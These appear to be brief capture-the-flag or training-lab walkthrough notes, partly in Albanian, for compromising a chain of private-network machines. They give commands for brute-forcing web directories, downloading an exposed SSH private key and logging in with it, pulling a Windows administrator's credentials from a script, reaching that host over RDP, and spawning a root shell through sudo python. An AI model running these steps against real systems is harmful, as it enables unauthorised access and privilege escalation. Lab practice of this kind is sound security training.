target 172.16.60.85 Ubuntu-10ubuntu0.1 

PORT   STATE SERVICE
80/tcp open  http

1
# dirb http://172.16.60.85
   http://172.16.60.85/id_rsa

2
# wget http://172.16.60.85/id_rsa
# chmod 400 id_rsa
# ssh -i id_rsa cyberacademy@172.16.60.85
  merr qasje $

3
$ ps -aux ## per ta par executable file
$ locate xxxx.py ##per ta gjetur lokacionin
$ cd /usr/bin
$ python2.7 Administrator_Password.py ## ky tregon te dhenat e next target

Next target was a windows its credentials was given in that file
4
 - me te dhenat e gjetura qasesh RDP ne target PC
 - metod tjeter nga nje linux OS 
   # rdesktop -u Administrator 172.16.65.92
     -kliko easy access (do te hapet cmd nese eshte ndrequr mepare)
    me gjet hiden file me info te next target
5
ne next target machine
$ sudo -l ##tregon comands qe munet mi bo run si user
$ sudo python -c 'import pty;pty.spawn("/bin/bash");'
# :)